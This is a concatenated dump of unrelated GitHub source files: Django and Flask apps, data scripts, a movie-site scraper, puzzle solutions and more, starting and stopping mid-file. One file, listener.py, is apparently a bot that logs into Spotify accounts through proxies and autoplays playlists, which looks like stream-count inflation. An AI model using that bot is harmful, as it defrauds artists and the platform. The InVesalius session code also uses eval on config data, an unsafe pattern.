Userlist.objects.filter(user=request.user)\n result_page = self.paginate_queryset(userlist, request, view=self)\n serializer = UserListSerializer(result_page, many=True)\n serializer_data = []\n\n for values in serializer.data:\n serializer_data.append(formatted_response(values))\n\n return self.get_paginated_response(serializer_data)\n\n\nclass UserlistViewDetail(APIView):\n\n authentication_classes = [TokenAuthentication]\n permission_classes = [HasPermission]\n\n def post(self, request: Request, anime_id):\n\n anime = get_object_or_404(Anime, pk=anime_id)\n serializer = UserListSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save(user=request.user, anime=anime)\n serializer_data = formatted_response(serializer.data)\n return Response(serializer_data, status.HTTP_201_CREATED)\n\n def patch(self, request: Request, myanime_id):\n\n my_anime = get_object_or_404(Userlist, pk=myanime_id)\n serializer = UserListSerializer(instance=my_anime, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n serializer_data = formatted_response(serializer.data)\n return Response(serializer_data, status.HTTP_200_OK)\n","repo_name":"brunotetzner/re-viewers","sub_path":"userslist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"2641972343","text":"import ConfigParser\nimport os\nimport shutil\nimport sys\nfrom threading import Thread\nimport time\n\nimport wx.lib.pubsub as ps\n\nfrom utils import Singleton, debug\n\nclass Session(object):\n # Only one session will be initialized per time. Therefore, we use\n # Singleton design pattern for implementing it\n __metaclass__= Singleton\n\n def __init__(self):\n self.temp_item = False\n\n ws = self.ws = WriteSession(self)\n ws.start()\n ps.Publisher().subscribe(self.StopRecording, \"Stop Config Recording\")\n\n def CreateItens(self):\n import constants as const\n self.project_path = ()\n self.debug = False\n\n self.project_status = const.PROJ_CLOSE\n # const.PROJ_NEW*, const.PROJ_OPEN, const.PROJ_CHANGE*,\n # const.PROJ_CLOSE\n\n self.mode = const.MODE_RP\n # const.MODE_RP, const.MODE_NAVIGATOR, const.MODE_RADIOLOGY,\n # const.MODE_ODONTOLOGY\n\n # InVesalius default projects' directory\n homedir = self.homedir = os.path.expanduser('~')\n tempdir = os.path.join(homedir, \".invesalius\", \"temp\")\n if not os.path.isdir(tempdir):\n os.makedirs(tempdir)\n self.tempdir = tempdir\n\n # GUI language\n self.language = \"\" # \"pt_BR\", \"es\"\n\n # Recent projects list\n self.recent_projects = [(const.SAMPLE_DIR, \"Cranium.inv3\")]\n self.last_dicom_folder = ''\n\n self.CreateSessionFile()\n\n def StopRecording(self, pubsub_evt):\n self.ws.Stop()\n\n def SaveConfigFileBackup(self):\n path = os.path.join(self.homedir ,\n '.invesalius', 'config.cfg')\n path_dst = os.path.join(self.homedir ,\n '.invesalius', 'config.backup')\n shutil.copy(path, path_dst)\n\n def RecoveryConfigFile(self):\n homedir = self.homedir = os.path.expanduser('~')\n try:\n path = os.path.join(self.homedir ,\n '.invesalius', 'config.backup')\n path_dst = os.path.join(self.homedir ,\n '.invesalius', 'config.cfg')\n shutil.copy(path, path_dst)\n return True\n except(IOError):\n return False\n\n\n def CloseProject(self):\n import constants as const\n debug(\"Session.CloseProject\")\n self.project_path = ()\n self.project_status = const.PROJ_CLOSE\n #self.mode = const.MODE_RP\n self.temp_item = False\n\n def SaveProject(self, path=()):\n import constants as const\n debug(\"Session.SaveProject\")\n self.project_status = const.PROJ_OPEN\n if path:\n self.project_path = path\n self.__add_to_list(path)\n if self.temp_item:\n self.temp_item = False\n\n def ChangeProject(self):\n import constants as const\n debug(\"Session.ChangeProject\")\n self.project_status = const.PROJ_CHANGE\n\n def CreateProject(self, filename):\n import constants as const\n debug(\"Session.CreateProject\")\n ps.Publisher().sendMessage('Begin busy cursor')\n # Set session info\n self.project_path = (self.tempdir, filename)\n self.project_status = const.PROJ_NEW\n self.temp_item = True\n return self.tempdir\n\n def OpenProject(self, filepath):\n import constants as const\n debug(\"Session.OpenProject\")\n # Add item to recent projects list\n item = (path, file) = os.path.split(filepath)\n self.__add_to_list(item)\n\n # Set session info\n self.project_path = item\n self.project_status = const.PROJ_OPEN\n\n def RemoveTemp(self):\n if self.temp_item:\n (dirpath, file) = self.project_path\n path = os.path.join(dirpath, file)\n os.remove(path)\n self.temp_item = False\n\n def CreateSessionFile(self):\n config = ConfigParser.RawConfigParser()\n\n config.add_section('session')\n config.set('session', 'mode', self.mode)\n config.set('session', 'status', self.project_status)\n config.set('session','debug', self.debug)\n config.set('session', 'language', self.language)\n\n config.add_section('project')\n config.set('project', 'recent_projects', self.recent_projects)\n\n config.add_section('paths')\n config.set('paths','homedir',self.homedir)\n config.set('paths','tempdir',self.tempdir)\n try:\n config.set('paths','last_dicom_folder',self.last_dicom_folder.encode('utf-8'))\n except (UnicodeEncodeError, UnicodeDecodeError):\n config.set('paths','last_dicom_folder',self.last_dicom_folder)\n path = os.path.join(self.homedir ,\n '.invesalius', 'config.cfg')\n\n configfile = open(path, 'wb')\n config.write(configfile)\n configfile.close()\n\n\n def __add_to_list(self, item):\n import constants as const\n # Last projects list\n l = self.recent_projects\n\n # If item exists, remove it from list\n if l.count(item):\n l.remove(item)\n\n # Add new item\n l.insert(0, item)\n\n # Remove oldest projects from list\n if len(l)>const.PROJ_MAX:\n for i in xrange(len(l)-const.PROJ_MAX):\n l.pop()\n\n def GetLanguage(self):\n return self.language\n\n def SetLanguage(self, language):\n self.language = language\n\n def GetLastDicomFolder(self):\n return self.last_dicom_folder\n\n def SetLastDicomFolder(self, folder):\n self.last_dicom_folder = folder\n self.CreateSessionFile()\n\n def ReadLanguage(self):\n config = ConfigParser.ConfigParser()\n home_path = os.path.expanduser('~')\n path = os.path.join(home_path ,'.invesalius', 'config.cfg')\n try:\n config.read(path)\n self.language = config.get('session','language')\n return self.language\n except (ConfigParser.NoSectionError,\n ConfigParser.NoOptionError,\n ConfigParser.MissingSectionHeaderError):\n return False\n\n def ReadSession(self):\n config = ConfigParser.ConfigParser()\n home_path = os.path.expanduser('~')\n path = os.path.join(home_path ,'.invesalius', 'config.cfg')\n try:\n config.read(path)\n self.mode = config.get('session', 'mode')\n self.project_status = config.get('session', 'status')\n self.debug = config.get('session','debug')\n self.language = config.get('session','language')\n self.recent_projects = eval(config.get('project','recent_projects'))\n self.homedir = config.get('paths','homedir')\n self.tempdir = config.get('paths','tempdir')\n self.last_dicom_folder = config.get('paths','last_dicom_folder')\n self.last_dicom_folder = self.last_dicom_folder.decode('utf-8')\n return True\n\n except(ConfigParser.NoSectionError, ConfigParser.NoOptionError,\n ConfigParser.MissingSectionHeaderError, ConfigParser.ParsingError):\n\n if (self.RecoveryConfigFile()):\n self.ReadSession()\n return True\n else:\n return False\n\n\nclass WriteSession(Thread):\n\n def __init__ (self, session):\n Thread.__init__(self)\n self.session = session\n self.runing = 1\n\n def run(self):\n while self.runing:\n time.sleep(10)\n try:\n self.Write()\n except AttributeError:\n debug(\"Session: trying to write into inexistent file\")\n\n def Stop(self):\n self.runing = 0\n\n def Write(self):\n import utils as utl\n\n config = ConfigParser.RawConfigParser()\n\n config.add_section('session')\n config.set('session', 'mode', self.session.mode)\n config.set('session', 'status', self.session.project_status)\n config.set('session','debug', self.session.debug)\n config.set('session', 'language', self.session.language)\n\n config.add_section('project')\n config.set('project', 'recent_projects', self.session.recent_projects)\n\n config.add_section('paths')\n config.set('paths','homedir',self.session.homedir)\n config.set('paths','tempdir',self.session.tempdir)\n config.set('paths','last_dicom_folder', self.session.last_dicom_folder)\n\n path = os.path.join(self.session.homedir ,\n '.invesalius', 'config.cfg')\n\n try:\n configfile = open(path, 'wb')\n except IOError:\n return\n utl.debug(\"Session - IOError\")\n finally:\n self.session.CreateSessionFile()\n\n configfile.close()\n\n\n\n\n","repo_name":"kragen/invesalius","sub_path":"invesalius/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":8732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"37055427400","text":"'''\n judge the number of age is even or odd.\n filename: assertage.py\n'''\n\ndef enterage(age):\n if age < 0:\n raise ValueError(\"Only positive integers are allowed\")\n\n if age % 2 == 0:\n print(\"age is even\")\n else:\n print(\"age is odd\")\n \ntry:\n num = int(input(\"Enter your age: \"))\n enterage(num)\nexcept ValueError:\n print(\"Only integers are allowed\")\nexcept:\n print(\"something is wrong\")","repo_name":"qiwsir/PythonCourse","sub_path":"first/chapter08/assertage.py","file_name":"assertage.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"84"} +{"seq_id":"28845351023","text":"from degiro_utils import *\nfrom market_data import update_market_data_series_csv\nfrom factor_data import update_factor_data_series_csv\nfrom just_etf_scraping import augment_product_details_csv\nfrom db_utils import *\n\n\ndef run_update_transactions_csv(degiro_session: degiroapi.DeGiro,\n start_date: str = '2000-01-01',\n transactions_csv_path: str = TRANSACTIONS_CSV_PATH) -> None:\n exit_loop = 'NO'\n\n while exit_loop == 'NO':\n # Update the transactions\n print('Updating the transactions csv...\\n')\n update_transactions_csv(\n degiro_session=degiro_session,\n transactions_csv_path=transactions_csv_path,\n start_date=start_date)\n print('Done.\\n')\n # Ask if another update from another account is needed\n exit_loop = ask_yes_no_question(\n 'Type YES if you want the routine to move forward to the Historical data retrieval.\\n\\nIn case you wish to '\n 'repeat the transactions csv update procedure for a different account, type NO. (y/n)... ')\n\n if exit_loop == 'NO':\n # Logout and start a new DeGiro session\n degiro_session.logout()\n degiro_session = start_degiro_session()\n\n\ndef run_update_product_price_series_csv(degiro_session: degiroapi.DeGiro,\n transactions_df: pd.DataFrame,\n product_price_series_csv_path: str = PRODUCT_PRICE_SERIES_CSV_PATH) -> None:\n product_id_ls = list(set(transactions_df['product_id'].tolist()))\n old_price_time_series = None # Initialize\n\n if os.path.exists(product_price_series_csv_path):\n old_price_time_series = pd.read_csv(\n product_price_series_csv_path, parse_dates=['date']).sort_values(['product_id', 'date'], ascending=True)\n product_id_to_last_update_date = old_price_time_series.groupby(['product_id'])[['date']].last()['date'].\\\n apply(lambda dt: dt.strftime(DATE_FORMAT)).to_dict()\n # Date to String\n old_price_time_series['date'] = old_price_time_series['date'].apply(lambda dt: dt.strftime(DATE_FORMAT))\n else:\n # Load full history\n product_id_to_last_update_date = dict(zip(product_id_ls, ['1900-01-01'] * len(product_id_ls)))\n\n # Loop through products and store new series\n updated_series = []\n for product_id in product_id_to_last_update_date.keys():\n updated_series.append(\n retrieve_product_price_series(degiro_session,\n [product_id],\n start_date=product_id_to_last_update_date.get(product_id, '1900-01-01')))\n new_price_time_series = pd.concat(updated_series, axis=0)\n # Date to String\n new_price_time_series['date'] = new_price_time_series['date'].apply(lambda dt: dt.strftime(DATE_FORMAT))\n\n if os.path.exists(product_price_series_csv_path): # Merge with old data\n new_price_time_series = pd.concat([new_price_time_series, old_price_time_series], axis=0).drop_duplicates()\n\n # Write csv\n new_price_time_series.sort_values(['product_id', 'date', 'price']).to_csv(product_price_series_csv_path,\n index=False)\n\n\ndef run_update(username: str = None,\n password: str = None,\n start_date: str = None,\n transactions_csv_path: str = TRANSACTIONS_CSV_PATH,\n product_details_csv_path: str = PRODUCT_DETAILS_CSV_PATH,\n product_price_series_csv_path: str = PRODUCT_PRICE_SERIES_CSV_PATH,\n ) -> None:\n # Retrieve last update date as a default\n start_date = check_last_update_date(transactions_csv_path) if start_date is None else start_date\n\n # Start a DeGiro session\n print('Welcome!\\n\\n')\n degiro_session = start_degiro_session(username=username, password=password)\n\n enter_loop = ask_yes_no_question('Do you want to update your DeGiro transactions? (y/n)...')\n\n # Update Transaction Data\n if enter_loop in ['Y', 'YES']:\n run_update_transactions_csv(degiro_session=degiro_session,\n start_date=start_date,\n transactions_csv_path=transactions_csv_path)\n\n # Load Transaction data\n transactions_df = load_transactions()\n\n enter_loop = ask_yes_no_question('Do you want to update your DeGiro Product Details? (y/n)...')\n if enter_loop in ['Y', 'YES']:\n print('Updating the product details csv...\\n')\n update_product_details_csv(\n degiro_session, transactions_df['product_id'].tolist(), product_details_csv_path)\n augment_product_details_csv(product_details_csv_path=product_details_csv_path)\n print('Done.\\n')\n\n print('Retrieving and storing Historical daily close prices...\\n')\n # Prices\n run_update_product_price_series_csv(degiro_session,\n transactions_df,\n product_price_series_csv_path)\n\n # Log out from DeGiro\n degiro_session.logout()\n\n enter_loop = ask_yes_no_question('Do you want to update market data? (y/n)...')\n if enter_loop in ['Y', 'YES']:\n print('Updating market data series csv...\\n')\n update_market_data_series_csv(market_data_details_path=MARKET_DATA_DETAILS_PATH,\n market_data_series_path=MARKET_DATA_SERIES_PATH)\n print('Done.\\n')\n\n enter_loop = ask_yes_no_question('Do you want to update factor data? (y/n)...')\n if enter_loop in ['Y', 'YES']:\n print('Updating factor data series csv...\\n')\n update_factor_data_series_csv(factor_data_details_path=FACTOR_DATA_DETAILS_PATH,\n factor_data_series_path=FACTOR_DATA_SERIES_PATH)\n print('Done.\\n')\n\n print('Update is finished. Exiting Routine...')\n\n\nif __name__ == '__main__':\n run_update()\n","repo_name":"lucalaringe/degiro_portfolio_analytics","sub_path":"src/run_update.py","file_name":"run_update.py","file_ext":"py","file_size_in_byte":6020,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"84"} +{"seq_id":"18398773687","text":"import pandas as pd\n\n# 读取数据\ndata = pd.read_csv(\"../FilteredData/version_0.0.1.csv\")\n\n# 找到重复数据\nduplicated_data = data[data.duplicated()]\n\n# 清洗重复数据\ncleaned_data = data.drop_duplicates()\n\n# 保存转换后的数据\ndata.to_csv(\"version_0.0.2.csv\", index=False)\n\n# 输出清洗后的数据\nprint(cleaned_data)\n\n\n","repo_name":"ZsmTeamProject/Project01","sub_path":"Filter/Filter_duplicated.py","file_name":"Filter_duplicated.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"26333259644","text":"import csv\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\nfilename = 'data/sitka_weather_2018_simple.csv'\nfilename2 = 'data/death_valley_2018_simple.csv'\n\n# reads header rows in CSV file\nwith open(filename) as f:\n weather = csv.reader(f)\n header_row = next(weather)\n station = next(weather)[1]\n\n # outputs data into lists\n highs, lows, dates = [], [], []\n for row in weather:\n date = datetime.strptime(row[2], '%Y-%m-%d')\n tmax = int(row[5])\n tmin = int(row[6])\n\n highs.append(tmax)\n lows.append(int(tmin))\n dates.append(date)\n\nwith open(filename2) as f2:\n reader2 = csv.reader(f2)\n header_row2 = next(reader2)\n\n # outputs data into lists\n highs2, lows2, dates2 = [], [], []\n for row in reader2:\n try:\n highs2.append(int(row[5]))\n except ValueError:\n pass\n else:\n lows2.append(int(row[6]))\n dates2.append(datetime.strptime(row[2], '%Y-%m-%d'))\n\nfig, ax = plt.subplots()\nplt.style.use('seaborn')\nax.plot(dates, highs, c='blue', alpha=0.5)\nax.plot(dates, lows, c='blue', alpha=0.5)\n\n#ax.plot(dates2, highs2, c='red', alpha=0.5)\n#ax.plot(dates2, lows2, c='red', alpha=0.5)\nfig.autofmt_xdate()\n\nplt.title(f'Temperature, {station}, 2018', fontsize=20)\nplt.xlabel('Date', fontsize=16)\nplt.ylabel('Temp. Fahr.', fontsize=16)\nplt.fill_between(dates, highs, lows, facecolor='blue', alpha=0.2)\n#plt.fill_between(dates2, highs2, lows2, facecolor='red', alpha=0.2)\nplt.tick_params(axis='both', which='major')\n\nplt.show()\n","repo_name":"ccreevan/matplotlib","sub_path":"sitka.py","file_name":"sitka.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"19536006160","text":"#coding:utf-8\n\nclass Host:\n\n def __init__(self, ip, query=None, totalRes=None, availableRes=None, status=None):\n self.ip = ip\n self.query = query\n self.totalRes = totalRes\n self.availableRes = availableRes\n self.status = status \n","repo_name":"alibaba/alimama-common-performance-platform-acp","sub_path":"Pressure/src/res_manager/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"84"} +{"seq_id":"7105720598","text":"# -*- coding: utf-8 -*-\n#------------------------------------------------------------\n# pelisalacarta - XBMC Plugin\n# Canal para peliculasaudiolatino\n# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/\n#------------------------------------------------------------\n\nimport re\nimport sys\nimport urlparse\n\nfrom core import config\nfrom core import logger\nfrom core import scrapertools\nfrom core import servertools\nfrom core.item import Item\n\n\nDEBUG = config.get_setting(\"debug\")\n \n\ndef mainlist(item):\n logger.info(\"channels.peliculasaudiolatino mainlist\")\n\n itemlist = []\n itemlist.append( Item(channel=item.channel, title=\"Recién agregadas\", action=\"peliculas\", url=\"http://peliculasaudiolatino.com/ultimas-agregadas.html\", viewmode=\"movie\"))\n itemlist.append( Item(channel=item.channel, title=\"Recién actualizadas\", action=\"peliculas\", url=\"http://peliculasaudiolatino.com/recien-actualizadas.html\", viewmode=\"movie\"))\n itemlist.append( Item(channel=item.channel, title=\"Las más vistas\", action=\"peliculas\", url=\"http://peliculasaudiolatino.com/las-mas-vistas.html\", viewmode=\"movie\"))\n \n itemlist.append( Item(channel=item.channel, title=\"Listado por géneros\" , action=\"generos\", url=\"http://peliculasaudiolatino.com\"))\n itemlist.append( Item(channel=item.channel, title=\"Listado por años\" , action=\"anyos\", url=\"http://peliculasaudiolatino.com\"))\n \n itemlist.append( Item(channel=item.channel, title=\"Buscar...\" , action=\"search\") )\n return itemlist\n\ndef peliculas(item):\n logger.info(\"channels.peliculasaudiolatino peliculas\")\n\n # Descarga la página\n data = scrapertools.cachePage(item.url)\n\n # Extrae las entradas de la pagina seleccionada\n patron = '\"([^\"]+)\"'\n\n')\n if next_page!=\"\":\n itemlist.append( Item(channel=item.channel, action=\"peliculas\", title=\">> Página siguiente\" , url=urlparse.urljoin(item.url,next_page).replace(\"/../../\",\"/\"), viewmode=\"movie\", folder=True) )\n\n return itemlist\n\ndef generos(item):\n logger.info(\"channels.peliculasaudiolatino generos\")\n itemlist = []\n\n # Descarga la página\n data = scrapertools.cachePage(item.url)\n\n # Limita el bloque donde buscar\n data = scrapertools.find_single_match(data,'')\n\n # Extrae las entradas\n patron = '([^<]+)<'\n matches = re.compile(patron,re.DOTALL).findall(data)\n if (DEBUG): scrapertools.printMatches(matches)\n \n for match in matches:\n scrapedurl = urlparse.urljoin(item.url,match[0])\n scrapedtitle = match[1].strip()\n scrapedthumbnail = \"\"\n scrapedplot = \"\"\n logger.info(scrapedtitle)\n\n itemlist.append( Item(channel=item.channel, action=\"peliculas\", title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail , plot=scrapedplot , folder=True, viewmode=\"movie\") )\n\n itemlist = sorted(itemlist, key=lambda Item: Item.title) \n return itemlist\n \ndef anyos(item):\n logger.info(\"channels.peliculasaudiolatino anyos\")\n itemlist = []\n\n # Descarga la página\n data = scrapertools.cachePage(item.url)\n\n # Limita el bloque donde buscar\n data = scrapertools.find_single_match(data,'
')\n logger.info(\"channels.peliculasaudiolatino data=\"+data)\n\n # Extrae las entradas\n patron = '([^<]+)<'\n matches = re.compile(patron,re.DOTALL).findall(data)\n if (DEBUG): scrapertools.printMatches(matches)\n \n for scrapedurl,scrapedtitle in matches:\n url = urlparse.urljoin(item.url,scrapedurl)\n title = scrapedtitle\n thumbnail = \"\"\n plot = \"\"\n if (DEBUG): logger.info(\"title=[\"+title+\"], url=[\"+url+\"], thumbnail=[\"+thumbnail+\"]\")\n\n itemlist.append( Item(channel=item.channel, action=\"peliculas\", title=title , url=url , thumbnail=thumbnail , plot=plot, folder=True, viewmode=\"movie\") )\n\n return itemlist\n\ndef search(item,texto):\n logger.info(\"channels.peliculasaudiolatino search\")\n itemlist = []\n\n texto = texto.replace(\" \",\"+\")\n try:\n # Series\n item.url=\"http://peliculasaudiolatino.com/busqueda.php?q=%s\"\n item.url = item.url % texto\n item.extra = \"\"\n itemlist.extend(peliculas(item))\n itemlist = sorted(itemlist, key=lambda Item: Item.title) \n \n return itemlist\n \n # Se captura la excepción, para no interrumpir al buscador global si un canal falla\n except:\n import sys\n for line in sys.exc_info():\n logger.error( \"%s\" % line )\n return []\n\ndef findvideos(item):\n logger.info(\"channels.peliculasaudiolatino videos\")\n # Descarga la página\n\n data = scrapertools.cachePage(item.url)\n data = scrapertools.find_single_match(data,'
(.*?)
\n
\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n '''\n patron = '([^<]+)= 0 and y < R and x >= 0 and x < C:\n if island[y][x] != '0':\n cnt += 1\n elif island[y][x] == '0':\n break\n else:\n break\ndef remove_island(spell,island):\n for lend in range(len(island)):\n island[lend] = island[lend].replace(spell,'0')\n\nx, y = 0, 0\nisland = ['HFDFFB', 'AJHGDH', 'DGAGEH']\nfor i in range(len(island)):\n print(island[i])\nremove_island(island[y][x],island)\nfor k in range(4):\n check(x, y, k)\nfor i in range(len(island)):\n print(island[i])","repo_name":"01090841589/solved_problem","sub_path":"solving/D4_수지의 수지 맞는 여행.py","file_name":"D4_수지의 수지 맞는 여행.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"641230959","text":"'''\r\nCreated on 09 gen 2019\r\n\r\n@author: Lorenzo Guenci (Student ID 1532651)\r\n'''\r\nfrom Bio import SeqIO\r\n\r\ndef vertex ():\r\n path_to_file = ''\r\n vertexes=[]\r\n with open(path_to_file, mode='r') as handle:\r\n for record in SeqIO.parse(handle, 'fasta'):\r\n description = record.description\r\n sequence = record.seq\r\n vertexes+=[[description, str(sequence)]]\r\n return vertexes\r\n\r\ndef adjacency_List(vertexes):\r\n vertexes_clone=vertexes[::]\r\n adjacency_list=[]\r\n for vertex in vertexes:\r\n suffix=vertex[1][-3:]\r\n for vertex_clone in vertexes_clone:\r\n if vertexes.index(vertex)==vertexes_clone.index(vertex_clone):\r\n continue\r\n prefix=vertex_clone[1][:3]\r\n if suffix==prefix:\r\n adjacency_list+=[[vertex[0], vertex_clone[0]]]\r\n return adjacency_list\r\nif __name__ == '__main__':\r\n for a in adjacency_List(vertex()):\r\n print(a[0]+\" \" + a[1])","repo_name":"Gohos322/HW4","sub_path":"Required by other Challenges/grph.py","file_name":"grph.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"31356146002","text":"\nfrom gc import collect\nfrom random import randint\nfrom shutil import rmtree\nfrom multiprocessing import Array, Lock, Process, Event\nfrom threading import Thread, current_thread\nfrom traceback import format_exc\nfrom src.services.config import Config\nfrom src.application.spotify import Spotify\nfrom xvfbwrapper import Xvfb\nfrom boto3 import client\nfrom src.services.drivers import DriverManager\nfrom src.services.console import Console\nfrom time import sleep\nfrom json import loads\nfrom src.services.proxies import ProxyManager, PROXY_FILE_LISTENER\nfrom src.services.x11vncwrapper import X11vnc\n\nclass ListenerContext:\n def __init__(self, console: Console, batchId: int, user: dict, playlist: str, shutdownEvent: Event, proxy: dict = None, vnc: bool = False, headless = True):\n self.console = console\n self.batchId = batchId\n self.user = user\n self.playlist = playlist\n self.proxy = proxy\n self.vnc = vnc\n self.headless = headless\n self.shutdownEvent = shutdownEvent \n \nclass Listener(Process):\n def __init__(self, pcontext: ListenerContext):\n Process.__init__(self)\n self.p_context = pcontext\n self.driverManager = DriverManager(pcontext.console, pcontext.shutdownEvent, startService=False)\n self.client = client('sqs')\n self.totalMessageReceived = 0\n self.proxyManager = ProxyManager(proxyFile=PROXY_FILE_LISTENER)\n self.lockClient = Lock()\n self.lockDriver = Lock()\n\n def run(self):\n tid = current_thread().native_id\n self.p_context.console.log('#%d Start' % tid)\n driver = None\n try:\n if self.p_context.shutdownEvent.is_set():\n return \n vdisplay = None\n x11vnc = None\n if t_context.headless == False:\n width = 1280\n height = 1024\n if 'windowSize' in t_context.user:\n [width,height] = t_context.user['windowSize'].split(',')\n vdisplay = Xvfb(width=width, height=height, colordepth=24, tempdir=None, noreset='+render')\n vdisplay.start()\n if t_context.vnc:\n x11vnc = X11vnc(vdisplay)\n x11vnc.start()\n\n with self.lockDriver:\n driverData = self.driverManager.getDriver(\n type='chrome',\n uid=tid,\n user=t_context.user,\n proxy=t_context.proxy,\n headless= t_context.headless\n )\n if not driverData:\n return\n driver = driverData['driver']\n userDataDir = driverData['userDataDir']\n if not driver:\n return\n \n except:\n self.p_context.console.error('Unavailale webdriver: %s' % format_exc())\n else:\n try:\n spotify = Spotify.Adapter(driver, self.p_context.console, self.p_context.shutdownEvent)\n if spotify.login(t_context.user['email'], t_context.user['password']):\n self.p_context.console.log('#%d Logged In' % tid)\n if not self.p_context.shutdownEvent.is_set():\n self.p_context.console.log('#%d Start listening...' % tid)\n spotify.playPlaylist(t_context.playlist, self.p_context.shutdownEvent, 90, 110)\n self.p_context.console.log('#%d Played' % tid)\n with self.lockClient:\n self.client.delete_message(\n QueueUrl=self.p_context.config.SQS_ENDPOINT,\n ReceiptHandle=t_context.receiptHandle\n )\n self.p_context.console.log('#%d Message deleted' % tid)\n except:\n self.p_context.console.exception()\n spotify.saveScreenshot()\n \n if driver:\n try:\n driver.quit()\n del driver\n except:\n pass\n if userDataDir:\n try:\n rmtree(path=userDataDir, ignore_errors=True)\n except:\n pass\n if x11vnc: #Terminate vnc server if any\n try:\n x11vnc.stop()\n del x11vnc\n except:\n pass\n if vdisplay:\n try:\n vdisplay.stop()\n del vdisplay\n except:\n pass\n collect()","repo_name":"adelamarre/zeus","sub_path":"src/application/spotify/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"72935632913","text":"class Solution:\n def restoreArray(self, adjacentPairs: List[List[int]]) -> List[int]:\n edges = {}\n heads = set()\n for n1, n2 in adjacentPairs:\n if n1 not in edges:\n edges[n1] = set()\n if n2 not in edges:\n edges[n2] = set()\n if n1 not in heads:\n heads.add(n1)\n else:\n heads.remove(n1)\n if n2 not in heads:\n heads.add(n2)\n else:\n heads.remove(n2) \n edges[n1].add(n2)\n edges[n2].add(n1)\n # print(list(heads))\n \n visited = set()\n ans = []\n node = list(heads)[0]\n visited.add(node)\n for i in range(len(adjacentPairs)+1):\n ans.append(node)\n for next_node in edges[node]:\n if next_node not in visited:\n node = next_node\n visited.add(next_node)\n return ans\n ","repo_name":"GreatStephen/MyLeetcodeSolutions","sub_path":"1contest226/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"28529593372","text":"'''n = s = 0\r\nwhile n != 999: #utilização de flags\r\n n = int(input('Digite um número:'))\r\n s += n\r\ns -= 999\r\nprint(f'A soma vale {s}')'''\r\n\r\n\r\nn = s = 0\r\nwhile True:\r\n n = int(input('Digite um número:'))\r\n if n == 999:\r\n break # se nao for igual 999 ele soma ,se for 999 sai de um enquanto e quebra(finalizando)\r\n s += n\r\nprint(f'A soma vale {s}')","repo_name":"https-luana/Aulas-de-Python-","sub_path":"CursoEmvideo/aula015.py","file_name":"aula015.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"23768435941","text":"from flask import Flask, render_template, request, g, flash, redirect, url_for, session\r\nimport numpy as np\r\nfrom tensorflow.keras.models import load_model\r\nfrom sklearn.impute import KNNImputer\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport sqlite3\r\n\r\napp = Flask(__name__, template_folder=\"C://Users//SJ//Desktop//ML Project//heart prediction//templates\",\r\n static_folder=\"C://Users//SJ//Desktop//ML Project//heart prediction//static\")\r\napp.secret_key = 'MLproject'\r\n\r\n\r\n# Establish a new connection for each thread\r\ndef get_db():\r\n db = getattr(g, '_database', None)\r\n if db is None:\r\n db = g._database = sqlite3.connect('HeartPrediction_History.db')\r\n return db\r\n\r\n@app.teardown_appcontext\r\ndef close_connection(exception):\r\n db = getattr(g, '_database', None)\r\n if db is not None:\r\n db.close()\r\n\r\n\r\n# Load the saved model\r\nmodel = load_model('heart_disease_model.h5')\r\n\r\n# Define the column names and ranges for validation\r\ncategorical_columns = [\"Smoking\", \"AlcoholDrinking\", \"Stroke\", \"DiffWalking\", \"Sex\", \"AgeCategory\", \"Race\", \"Diabetic\", \"PhysicalActivity\", \"GenHealth\", \"Asthma\", \"KidneyDisease\", \"SkinCancer\"]\r\nnumerical_columns = [\"PhysicalHealth\", \"SleepTime\", \"MentalHealth\", \"BMI\"]\r\ncolumn_ranges = {\r\n \"BMI\": (0, 100),\r\n \"SleepTime\": (0, 24),\r\n \"PhysicalHealth\": (0, 30),\r\n \"MentalHealth\": (0, 30)\r\n}\r\n\r\n@app.before_request\r\ndef check_session():\r\n if request.endpoint in ['startup', 'history','heart'] and 'id' not in session:\r\n return redirect(url_for('index'))\r\n\r\n@app.route(\"/startup\")\r\ndef startup():\r\n if 'id' in session:\r\n # Retrieve the user ID from the session\r\n user_id = session.get('id')\r\n if user_id:\r\n # Retrieve the user data from the database using the user_id\r\n user_data = query_user_data_from_database(user_id)\r\n return render_template(\"startup.html\", user_data=user_data)\r\n else:\r\n return redirect(url_for('index'))\r\n # User is not logged in, redirect to login page\r\n return redirect(url_for('index'))\r\n\r\n@app.route(\"/register\", methods=[\"POST\", \"GET\"])\r\ndef register():\r\n if request.method == 'POST':\r\n email = request.form['email']\r\n username = request.form['username']\r\n password = 